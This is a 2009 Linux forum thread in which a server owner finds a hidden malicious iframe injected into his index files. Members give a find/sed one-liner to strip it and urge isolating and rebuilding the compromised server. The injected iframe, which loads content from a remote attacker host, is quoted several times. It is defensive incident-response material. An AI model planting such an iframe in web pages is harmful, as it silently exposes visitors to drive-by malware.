A virus changed all my index files with iframe, how to remove that iframe line?

Farman · 07-14-2009, 07:44 AM

Hi there,

I've a dedicated server and don't know too much about Linux, but trying to manage it by learning slowly by looking at the tutorials etc.

I've several sites at my server, Today when I open my site I got an error message:

Code:

Parse error: syntax error, unexpected $end in /home/stuffloa/public_html/index.php on line 585

When I open the index.php file, I got this at line 585:

Code:

<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>

Now I want to remove this code from the entire server, it's infecting the pages which has <body> or named index.php, index.html etc.

Now It's impossible for me to check one by one file and remove this line manually. Is there any solution for removing this line at once?

And how can I prevent this from happening again?

Regards,

colucix · 07-14-2009, 07:52 AM

You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example

Code:

find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'

Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely is not needed in this case.

unSpawn · 07-14-2009, 08:16 AM

...also note you can use another separator (pipe symbol?) to avoid having to escape chars in use. Prevention partially depends on the security posture of the machine: exposing services to world that should not be, misconfiguring software, running stale, vulnerable software versions and anything that basically is crappy coded doesn't help.

tredegar · 07-14-2009, 08:19 AM

If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.

Farman · 07-14-2009, 08:56 AM

Quote:

Originally Posted by colucix

You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example

Code:

find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'

Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely is not needed in this case.

Thanks all of you,

When I try to run this command as a root in ssh,

Code:

find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'

i get nothing, "stuffloa" is my site which is in /home.

Where can be the problem?

Quote:

Originally Posted by tredegar

If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.

About 8 hours before my server attacked, I removed the line from several files at that time, till now it is ok, i mean it's not changed back to viral infected, So I will tight the security later, but for now I should clean all the infected files.

So which command should I use to remove the entire line from all of the files?

If more information needed about my server or paths, I can provide.

Thank you

unSpawn · 07-14-2009, 09:22 AM

Quote:

Originally Posted by Farman

When I try to run this command as a root in ssh

Does that mean you logged in over SSH as root account user?

Quote:

Originally Posted by Farman

About 8 hours before my server attacked, I removed the line from several files at that time, till now it is ok, i mean it's not changed back to viral infected, So I will tight the security later, but for now I should clean all the infected files.

No, it's not a choice you make. You have to (and can) do both simultaneously.

colucix · 07-14-2009, 09:40 AM

Quote:

Originally Posted by Farman

Code:

find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'

i get nothing, "stuffloa" is my site which is in /home.

Where can be the problem?

Apart the security concerns that I leave to unSpawn and other members more expert than me... what do you mean for "I get nothing"? That command should not give any standard output, just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some test: copy one of the files containing that line in a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.

Farman · 07-14-2009, 10:18 AM

Quote:

Originally Posted by colucix

Apart the security concerns that I leave to unSpawn and other members more expert than me... what do you mean for "I get nothing"? That command should not give any standard output, just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some test: copy one of the files containing that line in a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.

Thanks all once again for your kindness.

Oh I'm so sorry Colucix, I checked it and worked perfectly.

Now the question is How Can We Prevent this type of Attack?

unSpawn · 07-14-2009, 10:38 AM

It would be advisable for the OP to read this threads posts a little bit better.

r0b0 · 07-16-2009, 08:04 AM

Farman - STOP doing what you are doing RIGHT NOW.

Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.

Robert

unSpawn · 07-16-2009, 08:40 AM

Quote:

Originally Posted by r0b0

Farman - STOP doing what you are doing RIGHT NOW.

Nice. Usually it's me saying that sort of thing and phrasing it like that. However...

Quote:

Originally Posted by r0b0

Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.

Could it be you're mistaking a compromise of the root account with malarky on the service level? (Not that that is innocent if left as is.) In the Linux Security forum we deal with facts, so if you think a compromise of the root account has happened, wouldn't it be appropriate to ask the OP to collect data that supports your idea before telling him to wipe his machine? And even if there was a root account compromise, wouldn't he be heading for the same situation if he didn't know the intrusion vector?